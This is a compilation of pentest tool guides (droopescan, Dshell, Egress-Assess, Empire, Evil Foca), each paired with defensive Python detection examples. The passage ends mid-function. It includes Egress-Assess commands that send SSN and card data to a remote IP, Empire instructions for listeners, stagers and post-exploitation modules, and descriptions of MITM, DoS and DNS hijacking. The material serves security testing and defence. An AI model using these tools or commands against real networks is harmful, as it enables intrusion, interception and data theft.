https://www.example.org/sites/all/modules/
features/API.txt
[... snip for README ...]
[+] Scan finished (0:04:59.502427 elapsed)

You can get a full list of options by running:


droopescan --help
droopescan scan --help

Why not X?

Because droopescan:
is fast
is stable
is up to date
allows simultaneous scanning of multiple sites
is 100% python
Installation

Installation is easy using pip:


apt-get install python-pip
pip install droopescan

Manual installation is as follows:


git clone https://github.com/droope/droopescan.git
cd droopescan
pip install -r requirements.txt
droopescan scan --help

The master branch corresponds to the latest release (what is in


pypi). Development branch is unstable and all pull requests
must be made against it. More notes regarding installation can
be found here.
Features

Scan types.
Droopescan aims to be the most accurate by default, while not
overloading the target server due to excessive concurrent
requests. Due to this, by default, a large number of requests
will be made with four threads; change these settings by using
the --number and --threads arguments respectively.
This tool is able to perform four kinds of tests. By default all
tests are ran, but you can specify one of the following with the e or --enumerate flag:
p -- Plugin checks: Performs several thousand HTTP
requests and returns a listing of all plugins found to be
installed in the target host.
t -- Theme checks: As above, but for themes.
v -- Version checks: Downloads several files and, based
on the checksums of these files, returns a list of all
possible versions.
i -- Interesting url checks: Checks for interesting urls
(admin panels, readme files, etc.)
More notes regarding scanning can be found here.
Target specification

You can specify a particular host to scan by passing the -u or


--url parameter:
droopescan scan drupal -u example.org

You can also omit the drupal argument. This will trigger CMS
identification, like so:
droopescan scan -u example.org

Multiple URLs may be scanned utilising the -U or --url-file
parameter. This parameter should be set to the path of a file
which contains a list of URLs.
droopescan scan drupal -U list_of_urls.txt

The drupal parameter may also be omitted in this example.
For each site, it will make several GET requests in order to
perform CMS identification, and if the site is deemed to be a
supported CMS, it is scanned and added to the output list. This
can be useful, for example, to run droopescan across all your
organisation's sites.
droopescan scan -U list_of_urls.txt

The code block below contains an example list of URLs, one
per line:
http://localhost/drupal/6.0/
http://localhost/drupal/6.1/
http://localhost/drupal/6.10/
http://localhost/drupal/6.11/
http://localhost/drupal/6.12/

A file containing URLs and a value to override the default host
header with separated by tabs or spaces is also OK for URL
files. This can be handy when conducting a scan through a
large range of hosts and you want to prevent unnecessary DNS
queries. To clarify, an example below:
192.168.1.1 example.org
http://192.168.1.1/ example.org
http://192.168.1.2/drupal/ example.org

It is quite tempting to test whether the scanner works for a
particular CMS by scanning the official site (e.g.
wordpress.org for wordpress), but the official sites rarely run
vanilla installations of their respective CMS or do unorthodox
things. For example, wordpress.org runs the bleeding edge
version of wordpress, which will not be identified as wordpress
by droopescan at all because the checksums do not match any
known wordpress version.
Authentication
The application fully supports .netrc files and http_proxy
environment variables.
You can set the http_proxy and https_proxy variables. These
allow you to set a parent HTTP proxy, in which you can handle
more complex types of authentication (e.g. Fiddler, ZAP, Burp):
export http_proxy='user:password@localhost:8080'
export https_proxy='user:password@localhost:8080'
droopescan scan drupal --url http://localhost/drupal

Another option is to use a .netrc file for basic authentication. An
example ~/.netrc file could look as follows:
machine secret.google.com
login admin@google.com
password Winter01

WARNING: By design, to allow intercepting proxies and the
testing of applications with bad SSL, droopescan allows self-signed or otherwise invalid certificates.
Output
This application supports both "standard output", meant for
human consumption, and JSON, which is more suitable for
machine consumption. This output is stable between major
versions.
This can be controlled with the --output flag. Some sample
JSON output would look as follows (minus the excessive
whitespace):
{
  "themes": {
    "is_empty": true,
    "finds": [
    ]
  },
  "interesting urls": {
    "is_empty": false,
    "finds": [
      {
        "url": "https:\/\/www.drupal.org\/CHANGELOG.txt",
        "description": "Default changelog file."
      },
      {
        "url": "https:\/\/www.drupal.org\/user\/login",
        "description": "Default admin."
      }
    ]
  },
  "version": {
    "is_empty": false,
    "finds": [
      "7.29",
      "7.30",
      "7.31"
    ]
  },
  "plugins": {
    "is_empty": false,
    "finds": [
      {
        "url": "https:\/\/www.drupal.org\/sites\/all\/modules\/views\/",
        "name": "views"
      },
      [...snip...]
    ]
  }
}

Some attributes might be missing from the JSON object if parts
of the scan are not run.
This is what multi-site output looks like; each line contains a
valid JSON object as shown above.
$ droopescan scan drupal -U six_and_above.txt -e v
{"host": "http://localhost/drupal-7.6/", "version": {"is_empty": false, "finds": ["7.6"]}}
{"host": "http://localhost/drupal-7.7/", "version": {"is_empty": false, "finds": ["7.7"]}}
{"host": "http://localhost/drupal-7.8/", "version": {"is_empty": false, "finds": ["7.8"]}}
{"host": "http://localhost/drupal-7.9/", "version": {"is_empty": false, "finds": ["7.9"]}}
{"host": "http://localhost/drupal-7.10/", "version": {"is_empty": false, "finds": ["7.10"]}}
{"host": "http://localhost/drupal-7.11/", "version": {"is_empty": false, "finds": ["7.11"]}}
{"host": "http://localhost/drupal-7.12/", "version": {"is_empty": false, "finds": ["7.12"]}}
{"host": "http://localhost/drupal-7.13/", "version": {"is_empty": false, "finds": ["7.13"]}}
{"host": "http://localhost/drupal-7.14/", "version": {"is_empty": false, "finds": ["7.14"]}}
{"host": "http://localhost/drupal-7.15/", "version": {"is_empty": false, "finds": ["7.15"]}}
{"host": "http://localhost/drupal-7.16/", "version": {"is_empty": false, "finds": ["7.16"]}}
{"host": "http://localhost/drupal-7.17/", "version": {"is_empty": false, "finds": ["7.17"]}}
{"host": "http://localhost/drupal-7.18/", "version": {"is_empty": false, "finds": ["7.18"]}}
{"host": "http://localhost/drupal-7.19/", "version": {"is_empty": false, "finds": ["7.19"]}}
{"host": "http://localhost/drupal-7.20/", "version": {"is_empty": false, "finds": ["7.20"]}}
{"host": "http://localhost/drupal-7.21/", "version": {"is_empty": false, "finds": ["7.21"]}}
{"host": "http://localhost/drupal-7.22/", "version": {"is_empty": false, "finds": ["7.22"]}}
{"host": "http://localhost/drupal-7.23/", "version": {"is_empty": false, "finds": ["7.23"]}}
{"host": "http://localhost/drupal-7.24/", "version": {"is_empty": false, "finds": ["7.24"]}}
{"host": "http://localhost/drupal-7.25/", "version": {"is_empty": false, "finds": ["7.25"]}}
{"host": "http://localhost/drupal-7.26/", "version": {"is_empty": false, "finds": ["7.26"]}}
{"host": "http://localhost/drupal-7.27/", "version": {"is_empty": false, "finds": ["7.27"]}}
{"host": "http://localhost/drupal-7.28/", "version": {"is_empty": false, "finds": ["7.28"]}}
{"host": "http://localhost/drupal-7.29/", "version": {"is_empty": false, "finds": ["7.29"]}}
{"host": "http://localhost/drupal-7.30/", "version": {"is_empty": false, "finds": ["7.30"]}}
{"host": "http://localhost/drupal-7.31/", "version": {"is_empty": false, "finds": ["7.31"]}}
{"host": "http://localhost/drupal-7.32/", "version": {"is_empty": false, "finds": ["7.32"]}}
{"host": "http://localhost/drupal-7.33/", "version": {"is_empty": false, "finds": ["7.33"]}}
{"host": "http://localhost/drupal-7.34/", "version": {"is_empty": false, "finds": ["7.34"]}}

Download Droopescan
DSHELL - NETWORK FORENSIC ANALYSIS FRAMEWORK

An extensible network forensic analysis framework. Enables
rapid development of plugins to support the dissection of
network packet captures.
Key features:
Robust stream reassembly
IPv4 and IPv6 support
Custom output handlers
Chainable decoders

Prerequisites

Linux (developed on Ubuntu 12.04)
Python 2.7
pygeoip, GNU Lesser GPL
MaxMind GeoIP Legacy datasets
PyCrypto, custom license
dpkt, New BSD License
IPy, BSD 2-Clause License
pypcap, New BSD License

Installation

1. Install all of the necessary Python modules listed above.
Many of them are available via pip and/or apt-get. Pygeoip
is not yet available as a package and must be installed
with pip or manually. All except dpkt are available with pip.
   1. sudo apt-get install python-crypto python-dpkt python-ipy python-pypcap
   2. sudo pip install pygeoip
2. Configure pygeoip by moving the MaxMind data files
(GeoIP.dat, GeoIPv6.dat, GeoIPASNum.dat,
GeoIPASNumv6.dat) to /share/GeoIP/
3. Run make. This will build Dshell.
4. Run ./dshell. This is Dshell. If you get a Dshell> prompt,
you're good to go!
Basic usage

decode -l
    This will list all available decoders alongside basic information about them

decode -h
    Show generic command-line flags available to most decoders

decode -d <decoder>
    Display information about a decoder, including available command-line flags

decode -d <decoder> <pcap>
    Run the selected decoder on a pcap file

Usage Examples

Showing DNS lookups in sample traffic

Dshell> decode -d dns ~/pcap/dns.cap
dns 2005-03-30 03:47:46 192.168.170.8:32795 -> 192.168.170.20:53 ** 39867 PTR? 66.192.9.104 / PTR: 66-192-9-104.gen.twtelecom.net **
dns 2005-03-30 03:47:46 192.168.170.8:32795 -> 192.168.170.20:53 ** 30144 A? www.netbsd.org / A: 204.152.190.12 (ttl 82159s) **
dns 2005-03-30 03:47:46 192.168.170.8:32795 -> 192.168.170.20:53 ** 61652 AAAA? www.netbsd.org / AAAA: 2001:4f8:4:7:2e0:81ff:fe52:9a6b (ttl 86400s) **
dns 2005-03-30 03:47:46 192.168.170.8:32795 -> 192.168.170.20:53 ** 32569 AAAA? www.netbsd.org / AAAA: 2001:4f8:4:7:2e0:81ff:fe52:9a6b (ttl 86340s) **
dns 2005-03-30 03:47:46 192.168.170.8:32795 -> 192.168.170.20:53 ** 36275 AAAA? www.google.com / CNAME: www.l.google.com **
dns 2005-03-30 03:47:46 192.168.170.8:32795 -> 192.168.170.20:53 ** 9837 AAAA? www.example.notginh / NXDOMAIN **
dns 2005-03-30 03:52:17 192.168.170.8:32796 <- 192.168.170.20:53 ** 23123 PTR? 127.0.0.1 / PTR: localhost **
dns 2005-03-30 03:52:25 192.168.170.56:1711 <- 217.13.4.24:53 ** 30307 A? GRIMM.utelsystems.local / NXDOMAIN **
dns 2005-03-30 03:52:17 192.168.170.56:1710 <- 217.13.4.24:53 ** 53344 A? GRIMM.utelsystems.local / NXDOMAIN **
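Added example (not Dshell code): a parser for the dns decoder's output lines in the layout shown above, followed by a per-client NXDOMAIN-ratio check of the kind a defender would run over a capture. The sample lines are copied from the output above, the last one is constructed, and the field-separator and arrow conventions are assumptions read off that output.

```python
"""Parse Dshell dns-decoder output and compute per-client NXDOMAIN ratios.

Added example, not part of Dshell. It expects the line layout shown above
(timestamp, client:port, arrow, server:port, then `** id TYPE? name /
answer **`), with any amount of whitespace between fields. The sample
lines are copied from the output above; the last one is constructed so the
heuristic has a second failing lookup to count.
"""
import re
from collections import defaultdict

DNS_LINE = re.compile(
    r"^dns\s+(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)\s+"
    r"(?P<client>[0-9a-f.:]+):(?P<cport>\d+)\s+(?P<dir>->|<-)\s+"
    r"(?P<server>[0-9a-f.:]+):(?P<sport>\d+)\s+"
    r"\*\* (?P<txid>\d+) (?P<qtype>[A-Z]+)\? (?P<qname>\S+) / (?P<answer>.*?) \*\*$"
)

SAMPLE_LINES = """\
dns 2005-03-30 03:47:46 192.168.170.8:32795 -> 192.168.170.20:53 ** 39867 PTR? 66.192.9.104 / PTR: 66-192-9-104.gen.twtelecom.net **
dns 2005-03-30 03:47:46 192.168.170.8:32795 -> 192.168.170.20:53 ** 30144 A? www.netbsd.org / A: 204.152.190.12 (ttl 82159s) **
dns 2005-03-30 03:47:46 192.168.170.8:32795 -> 192.168.170.20:53 ** 36275 AAAA? www.google.com / CNAME: www.l.google.com **
dns 2005-03-30 03:47:46 192.168.170.8:32795 -> 192.168.170.20:53 ** 9837 AAAA? www.example.notginh / NXDOMAIN **
dns 2005-03-30 03:52:25 192.168.170.56:1711 <- 217.13.4.24:53 ** 30307 A? GRIMM.utelsystems.local / NXDOMAIN **
dns 2005-03-30 03:52:17 192.168.170.56:1710 <- 217.13.4.24:53 ** 53344 A? GRIMM.utelsystems.local / NXDOMAIN **
dns 2005-03-30 03:53:01 192.168.170.56:1712 <- 217.13.4.24:53 ** 41001 A? kq7x2m.example / NXDOMAIN **
"""


def parse_dns_lines(text):
    """Return one dict per well-formed dns decoder line; other lines are skipped."""
    records = []
    for line in text.splitlines():
        m = DNS_LINE.match(line.strip())
        if m:
            rec = m.groupdict()
            rec["nxdomain"] = rec["answer"] == "NXDOMAIN"
            records.append(rec)
    return records


def nxdomain_report(records, min_queries=3, ratio=0.5):
    """Per-client counts plus a 'suspicious' flag for clients that made at
    least min_queries lookups and got NXDOMAIN for at least `ratio` of them.
    A plain lookup-failure heuristic: misconfigured resolvers trip it too,
    so it is a triage signal, not a verdict."""
    stats = defaultdict(lambda: {"queries": 0, "nxdomain": 0, "names": set()})
    for rec in records:
        s = stats[rec["client"]]
        s["queries"] += 1
        s["names"].add(rec["qname"].lower())
        if rec["nxdomain"]:
            s["nxdomain"] += 1
    report = {}
    for client, s in stats.items():
        share = s["nxdomain"] / s["queries"]
        report[client] = {
            "queries": s["queries"],
            "nxdomain": s["nxdomain"],
            "distinct_names": len(s["names"]),
            "suspicious": s["queries"] >= min_queries and share >= ratio,
        }
    return report


if __name__ == "__main__":
    for client, info in nxdomain_report(parse_dns_lines(SAMPLE_LINES)).items():
        print(client, info)
```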

Following and reassembling a stream in sample traffic

Dshell> decode -d followstream ~/pcap/v6-http.cap
Connection 1 (TCP)
Start: 2007-08-05 19:16:44.189852 UTC
End: 2007-08-05 19:16:44.204687 UTC
2001:6f8:102d:0:2d0:9ff:fee3:e8de:59201 -> 2001:6f8:900:7c0::2:80 (240 bytes)
2001:6f8:900:7c0::2:80 -> 2001:6f8:102d:0:2d0:9ff:fee3:e8de:59201 (2259 bytes)

GET / HTTP/1.0
Host: cl-1985.ham-01.de.sixxs.net
Accept: text/html, text/plain, text/css, text/sgml, */*;q=0.01
Accept-Encoding: gzip, bzip2
Accept-Language: en
User-Agent: Lynx/2.8.6rel.2 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8b

HTTP/1.1 200 OK
Date: Sun, 05 Aug 2007 19:16:44 GMT
Server: Apache
Content-Length: 2121
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /</title>
</head>
<body>
<h1>Index of /</h1>
<pre><img src="/icons/blank.gif" alt="Icon "> <a href="?C=N;O=D">Name</a> <a href="?C=M;O=A">Last modified</a> <a href="?C=S;O=A">Size</a> <a href="?C=D;O=A">Description</a><hr><img src="/icons/folder.gif" alt="[DIR]"> <a href="202-vorbereitung/">202-vorbereitung/</a> 06-Jul-2007 14:31
<img src="/icons/layout.gif" alt="[   ]"> <a href="Efficient_Video_on_demand_over_Multicast.pdf">Efficient_Video_on_d..&gt;</a> 19-Dec-2006 03:17 291K
<img src="/icons/unknown.gif" alt="[   ]"> <a href="Welcome%20Stranger!!!">Welcome Stranger!!!</a> 28-Dec-2006 03:46
<img src="/icons/text.gif" alt="[TXT]"> <a href="barschel.htm">barschel.htm</a> 31-Jul-2007 02:21 44K
<img src="/icons/folder.gif" alt="[DIR]"> <a href="bnd/">bnd/</a> 30-Dec-2006 08:59
<img src="/icons/folder.gif" alt="[DIR]"> <a href="cia/">cia/</a> 28-Jun-2007 00:04
<img src="/icons/layout.gif" alt="[   ]"> <a href="cisco_ccna_640-801_command_reference_guide.pdf">cisco_ccna_640-801_c..&gt;</a> 28-Dec-2006 03:48 236K
<img src="/icons/folder.gif" alt="[DIR]"> <a href="doc/">doc/</a> 19-Sep-2006 01:43
<img src="/icons/folder.gif" alt="[DIR]"> <a href="freenetproto/">freenetproto/</a> 06-Dec-2006 09:00
<img src="/icons/folder.gif" alt="[DIR]"> <a href="korrupt/">korrupt/</a> 03-Jul-2007 11:57
<img src="/icons/folder.gif" alt="[DIR]"> <a href="mp3_technosets/">mp3_technosets/</a> 04-Jul-2007 08:56
<img src="/icons/text.gif" alt="[TXT]"> <a href="neues_von_rainald_goetz.htm">neues_von_rainald_go..&gt;</a> 21-Mar-2007 23:27 31K
<img src="/icons/text.gif" alt="[TXT]"> <a href="neues_von_rainald_goetz0.htm">neues_von_rainald_go..&gt;</a> 21-Mar-2007 23:29 36K
<img src="/icons/layout.gif" alt="[   ]"> <a href="pruef.pdf">pruef.pdf</a> 28-Dec-2006 07:48 88K
<hr></pre>
</body></html>

Chaining decoders to view flow data for a specific country code
in sample traffic (note: TCP handshakes are not included in the
packet count)
Dshell> decode -d country+netflow --country_code=JP ~/pcap/SkypeIRC.cap
[Output columns lost in extraction. The four flows listed are all 192.168.1.2 -> 202.232.205.123 (-- -> JP), UDP, from source port 60583 to destination ports 33435, 33436, 33437 and 33438, 36 bytes each, duration 0.0000s, timestamped 2006-08-25 19:32:20.634046, .651502, .747503 and .766761.]

Collecting netflow data for sample traffic with vlan headers,
then tracking the connection to a specific IP address
Dshell> decode -d netflow ~/pcap/vlan.cap
[Output columns lost in extraction. The flows listed are timestamped 1999-11-05 18:20:40 to 18:20:43 and are all UDP: RIP broadcasts (port 520 -> 520, 24 bytes, US -> --) from 131.151.1.254, 131.151.5.254, 131.151.6.254, 131.151.10.254, 131.151.32.254, 131.151.107.254, 131.151.111.254 and 131.151.115.254 to 255.255.255.255, and NetBIOS datagrams (ports 137 -> 137 and 138 -> 138, 138 to 201 bytes, US -> US, one lasting 1.5020s) from hosts including 131.151.32.71, 131.151.104.96, 131.151.5.55 and 131.151.32.79 to subnet broadcast addresses such as 131.151.5.255, 131.151.32.255 and 131.151.107.255.]

Download Dshell
EGRESS-ASSESS - TOOL USED TO TEST EGRESS DATA
DETECTION CAPABILITIES

Egress-Assess is a tool used to test egress data detection
capabilities.
Setup

To setup, run the included setup script, or perform the
following:
1. Install pyftpdlib
2. Generate a server certificate and store it as "server.pem"
on the same level as Egress-Assess. This can be done
with the following command:
"openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes"

Usage

Typical use case for Egress-Assess is to copy this tool in two
locations. One location will act as the server, the other will act
as the client. Egress-Assess can send data over FTP, HTTP,
and HTTPS.
To extract data over FTP, you would first start Egress-Assess's
FTP server by selecting --server ftp and providing a username
and password to use:
./Egress-Assess.py --server ftp --username testuser --password pass123

Now, to have the client connect and send data to the ftp server,
you could run...
./Egress-Assess.py --client ftp --username testuser --password pass123 --ip 192.168.63.149 --datatype ssn

Also, you can setup Egress-Assess to act as a web server by
running....
./Egress-Assess.py --server https

Then, to send data to the FTP server, and to specifically send
15 megs of credit card data, run the following command...
./Egress-Assess.py --client https --data-size 15 --ip 192.168.63.149 --datatype cc
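Added example (not Egress-Assess code): the detection side of the test, a scanner that looks for SSN-shaped values and Luhn-valid card numbers in an outbound payload, the two datatypes used above, and alerts once enough of them appear. The payloads are constructed, the card numbers are the usual public test numbers, and the alert threshold is an arbitrary choice.

```python
"""Flag SSN-shaped and card-number-shaped values in an outbound payload.

Added example, not Egress-Assess code. Egress-Assess's --datatype ssn and
--datatype cc push synthetic identifiers out over FTP/HTTP/HTTPS so an
egress control can be tested; this is the check such a control would run
on the captured payload. Payloads below are constructed, and the card
numbers are the usual publicly documented test numbers.
"""
import re

# US SSN: area not 000/666/9xx, group not 00, serial not 0000.
SSN_RE = re.compile(r"\b(?!000|666|9\d\d)\d{3}-(?!00)\d{2}-(?!0000)\d{4}\b")
# 13 to 19 digits, optionally separated by single spaces or hyphens.
CARD_RE = re.compile(r"\b\d(?:[ -]?\d){12,18}\b")


def luhn_ok(digits):
    """Luhn check-digit validation; weeds out most random digit runs."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # every second digit from the right is doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_ssns(text):
    """All SSN-shaped tokens in the text."""
    return SSN_RE.findall(text)


def find_cards(text):
    """Card-like digit runs that also pass Luhn, with separators stripped."""
    hits = []
    for m in CARD_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group(0))
        if luhn_ok(digits):
            hits.append(digits)
    return hits


def score_payload(payload, threshold=5):
    """Count identifiers and alert when the total reaches threshold, so a
    single stray number in a form post does not page anyone."""
    ssns = find_ssns(payload)
    cards = find_cards(payload)
    return {"ssn": len(ssns), "cc": len(cards),
            "alert": len(ssns) + len(cards) >= threshold}


# Constructed payloads: a batch of fake SSNs, two test card numbers next to
# a non-Luhn order id, and benign text containing phone and reference numbers.
SSN_PAYLOAD = "\n".join(
    f"record {i}: {ssn}" for i, ssn in enumerate(
        ["123-45-6789", "234-56-7890", "345-67-8901",
         "456-78-9012", "567-89-0123", "678-90-1234"]))
CC_PAYLOAD = "card=4111 1111 1111 1111&card=5500-0000-0000-0004&order=1234567890123"
BENIGN_PAYLOAD = "Call 555-123-4567 about invoice INV-20160101-77, ref 900-12-3456."


if __name__ == "__main__":
    for name, payload in [("ssn", SSN_PAYLOAD), ("cc", CC_PAYLOAD),
                          ("benign", BENIGN_PAYLOAD)]:
        print(name, score_payload(payload))
```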

Download Egress-Assess
EMPIRE - POWERSHELL POST-EXPLOITATION AGENT

Empire is a pure PowerShell post-exploitation agent built on
cryptologically-secure communications and a flexible
architecture. Empire implements the ability to run PowerShell
agents without needing powershell.exe, rapidly deployable
post-exploitation modules ranging from key loggers to
Mimikatz, and adaptable communications to evade network
detection, all wrapped up in a usability-focused framework.
Why PowerShell?

PowerShell offers a multitude of offensive advantages,
including full .NET access, application whitelisting, direct
access to the Win32 API, the ability to assemble malicious
binaries in memory, and a default installation on Windows 7+.
Offensive PowerShell had a watershed year in 2014, but
despite the multitude of useful projects, many pentesters still
struggle to integrate PowerShell into their engagements in a
secure manner.
Initial Setup

Run the ./setup/install.sh script. This will install the
few dependencies and run the ./setup/setup_database.py
script. The setup_database.py file contains various settings that
you can manually modify, and then initializes the ./data/
empire.db backend database. No additional configuration
should be needed; hopefully everything works out of the box.
Running ./empire will start Empire, and ./empire debug will
generate a verbose debug log at ./empire.debug. The
included ./data/reset.sh will reset/reinitialize the database and
launch Empire in debug mode.
Main Menu

Once you hit the main menu, you'll see the number of active
agents, listeners, and loaded modules.

The help command should work for all menus, and almost
everything that can be tab-completable is (menu commands,
agent names, local file paths where relevant, etc.).

You can ctrl+C to rage quit at any point. Starting Empire back
up should preserve existing communicating agents, and any
existing listeners will be restarted (as their config is stored in
the sqlite backend database).
Listeners 101

The first thing you need to do is set up a local listener. The
listeners command will jump you to the listener management
menu. Any active listeners will be displayed, and this
information can be redisplayed at any time with the list
command. The info command will display the currently set
listener options.

Set your host/port by doing something like set Host
http://192.168.52.142:8081 (this is tab-completable, and you
can also use domain names here). The port will automatically
be pulled out, and the backend will detect if you're doing a
HTTP or HTTPS listener. For HTTPS listeners, you must first
set the CertPath to be a local .pem file. The provided ./data/
cert.sh script will generate a self-signed cert and place it in ./
data/empire.pem.
Set the optional WorkingHours, KillDate, DefaultDelay, and
DefaultJitter for the listener, as well as whatever name you
want it to be referred to as. You can then type execute to start
the listener. If the name is already taken, a nameX variant will
be used, and Empire will alert you if the port is already in use.
Stagers 101

The staging process and a complete description of the
available stagers is detailed here and here.
Empire implements various stagers in a modular format in ./lib/
stagers/*. These include dlls, macros, one-liners, and more. To
use a stager, from the main, listeners, or agents menu, use
usestager <tab> to tab-complete the set of available stagers,
and you'll be taken to the individual stager's menu. The UI here
functions similarly to the post module menu, i.e. set/unset/info
and generate to generate the particular output code.
For UserAgent and proxy options, default uses the system
defaults, none clears that option from being used in the stager,
and anything else is assumed to be a custom setting (note, this
last bit isn't properly implemented for proxy settings yet). From
the Listeners menu, you can run the launcher [listener ID/
name] alias to generate the stage0 launcher for a particular
listener (this is the stagers/launcher module in the
background). This command can be run from a command
prompt on any machine to kick off the staging process. (NOTE:
you will need to right click cmd.exe and choose run as
administrator before pasting/running this command if you want
to use modules that require administrative privileges). Our
PowerShell version of BypassUAC module is in the works but
not 100% complete yet.
Agents 101

You should see a status message when an agent checks in
(i.e. [+] Initial agent CGUBKC1R3YLHZM4V from
192.168.52.168 now active). Jump to the Agents menu with
agents. Basic information on active agents should be
displayed. Various commands can be executed on specific
agent IDs or all from the agent menu, i.e. kill all. To interact
with an agent, use interact AGENT_NAME. Agent names
should be tab-completable for all commands.

In an Agent menu, info will display more detailed agent
information, and help will display all agent commands. If a
typed command isn't resolved, Empire will try to interpret it as a
shell command (like ps). You can cd directories, upload/
download files, and rename NEW_NAME.
For each registered agent, a ./downloads/AGENT_NAME/
folder is created (this folder is renamed with an agent rename).
An ./agent.log is created here with timestamped commands/
results for agent communication. Downloads/module outputs
are broken out into relevant folders here as well.
When you're finished with an agent, use exit from the Agent
menu or kill NAME/all from the Agents menu. You'll get a red
notification when the agent exits, and the agent will be removed
from the interactive list after.
Modules 101

To see available modules, type usemodule <tab>. To search
module names/descriptions, use searchmodule privesc and
matching module names/descriptions will be output.
To use a module, for example netview from PowerView, type
usemodule situational_awareness/network/sharefinder and
press enter. info will display all current module options.
To set an option, like the domain for sharefinder, use set
Domain testlab.local. The Agent argument is always required,
and should be auto-filled from jumping to a module from an
agent menu. You can also set Agent <tab> to tab-complete an
agent name. execute will task the agent to execute the module,
and back will return you to the agents main menu. Results will
be displayed as they come back.
Scripts

In addition to formalized modules, you are able to simply import
and use a .ps1 script in your remote empire agent. Use the
scriptimport ./path/ command to import the script. The script
will be imported and any functions accessible to the script will
now be tab completable using the scriptcmd command in the
agent. This works well for very large scripts with lots of
functions that you do not want to break into a module.

Download Empire
EVIL FOCA - MITM, DOS, DNS HIJACKING IN IPV4 AND
IPV6 PENETRATION TESTING TOOL

Evil Foca is a tool for security pentesters and auditors whose
purpose it is to test security in IPv4 and IPv6 data networks.
The tool is capable of carrying out various attacks such as:
MITM over IPv4 networks with ARP Spoofing and DHCP
ACK Injection.

MITM on IPv6 networks with Neighbor Advertisement
Spoofing, SLAAC attack, fake DHCPv6.
DoS (Denial of Service) on IPv4 networks with ARP
Spoofing.
DoS (Denial of Service) on IPv6 networks with SLAAC
DoS.
DNS Hijacking.
The software automatically scans the networks and identifies all
devices and their respective network interfaces, specifying their
IPv4 and IPv6 addresses as well as the physical addresses
through a convenient and intuitive interface.
Requirements

Windows XP or later.
.NET Framework 4 or later.
Winpcap library (http://www.winpcap.org)

Man In The Middle (MITM) attack

The well-known Man In The Middle is an attack in which the
wrongdoer creates the possibility of reading, adding, or
modifying information that is located in a channel between two
terminals with neither of these noticing. Within the MITM
attacks in IPv4 and IPv6 Evil Foca considers the following
techniques:
ARP Spoofing: Consists in sending ARP messages to the
Ethernet network. Normally the objective is to associate
the MAC address of the attacker with the IP of another
device. Any traffic directed to the IP address of the
predetermined link gate will be erroneously sent to the
attacker instead of its real destination.
DHCP ACK Injection: Consists in an attacker monitoring
the DHCP exchanges and, at some point during the
communication, sending a packet to modify its behavior.
Evil Foca converts the machine in a fake DHCP server on
the network.

Neighbor Advertisement Spoofing: The principle of this
attack is identical to that of ARP Spoofing, with the
difference being that IPv6 doesn't work with the ARP
protocol, but that all information is sent through ICMPv6
packets. There are five types of ICMPv6 packets used in
the discovery protocol and Evil Foca generates this type of
packets, placing itself between the gateway and victim.
SLAAC attack: The objective of this type of attack is to be
able to execute an MITM when a user connects to Internet
and to a server that does not include support for IPv6 and
to which it is therefore necessary to connect using IPv4.
This attack is possible due to the fact that Evil Foca
undertakes domain name resolution once it is in the
communication media, and is capable of transforming
IPv4 addresses in IPv6.
Fake DHCPv6 server: This attack involves the attacker
posing as the DCHPv6 server, responding to all network
requests, distributing IPv6 addresses and a false DNS to
manipulate the user destination or deny the service.
Denial of Service (DoS) attack: The DoS attack is an
attack on a system of machines or a network that results in a
service or resource being inaccessible to its users.
Normally it provokes the loss of network connectivity due
to consumption of the bandwidth of the victim's network,
or overloads the computing resources of the victim's
system.
DoS attack in IPv4 with ARP Spoofing: This type of DoS
attack consists in associating a nonexistent MAC address
in a victim's ARP table. This results in rendering the
machine whose ARP table has been modified incapable of
connecting to the IP address associated to the nonexistent
MAC.
DoS attack in IPv6 with SLAAC attack: In this type of
attack a large quantity of router advertisement packets
are generated, destined to one or several machines,
announcing false routers and assigning a different IPv6
address and link gate for each router, collapsing the
system and making machines unresponsive.
DNS Hijacking: The DNS Hijacking attack or DNS
kidnapping consists in altering the resolution of the
domain names system (DNS). This can be achieved using
malware that invalidates the configuration of a TCP/IP
machine so that it points to a pirate DNS server under the
attackers control, or by way of an MITM attack, with the
attacker being the party who receives the DNS requests,
and responding himself or herself to a specific DNS
request to direct the victim toward a specific destination
selected by the attacker.
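Added example (not Evil Foca code): detection logic for two of the techniques described above, an ARP reply that rebinds the gateway's IP to another MAC (ARP Spoofing) and a burst of Router Advertisements announcing many distinct routers (SLAAC DoS), run over a constructed event list. The gateway address, MAC addresses, prefixes and thresholds are all made up for the example.

```python
"""Detect ARP-spoofing and rogue-RA patterns in link-layer events.

Added example, not part of Evil Foca. Two of the techniques described
above leave simple traces on the wire: an ARP reply that rebinds the
gateway's IP to a different MAC (ARP Spoofing), and a burst of Router
Advertisements announcing many distinct routers (SLAAC DoS). The event
list below is constructed; gateway address, MACs and prefixes are made up.
"""
from collections import defaultdict

GATEWAY_IP = "192.168.1.1"   # assumed gateway of the sample network

# Constructed events: (time_s, kind, source_mac, detail)
#   kind "arp_reply": detail is the IP address the reply claims to own
#   kind "ra":        detail is the prefix the Router Advertisement announces
EVENTS = [
    (0.0, "arp_reply", "00:11:22:33:44:01", GATEWAY_IP),
    (1.0, "arp_reply", "00:11:22:33:44:10", "192.168.1.10"),
    (2.0, "arp_reply", "00:11:22:33:44:20", "192.168.1.20"),
    (3.5, "arp_reply", "00:11:22:33:44:20", GATEWAY_IP),   # gateway rebound to host .20's MAC
    (4.0, "ra", "00:11:22:33:44:01", "2001:db8:1::/64"),    # legitimate router
    (5.0, "ra", "00:11:22:33:44:99", "2001:db8:bad:1::/64"),
    (5.1, "ra", "00:11:22:33:44:99", "2001:db8:bad:2::/64"),
    (5.2, "ra", "00:11:22:33:44:99", "2001:db8:bad:3::/64"),
    (5.3, "ra", "00:11:22:33:44:99", "2001:db8:bad:4::/64"),
]


def detect_arp_spoofing(events, gateway_ip=GATEWAY_IP):
    """Track IP->MAC bindings seen in ARP replies and report
    (a) any IP whose MAC changes, and
    (b) a MAC that ends up owning the gateway IP as well as other hosts' IPs,
    which is what an ARP-spoofing MITM looks like from a passive sensor."""
    ip_to_mac = {}
    alerts = []
    for ts, kind, mac, ip in events:
        if kind != "arp_reply":
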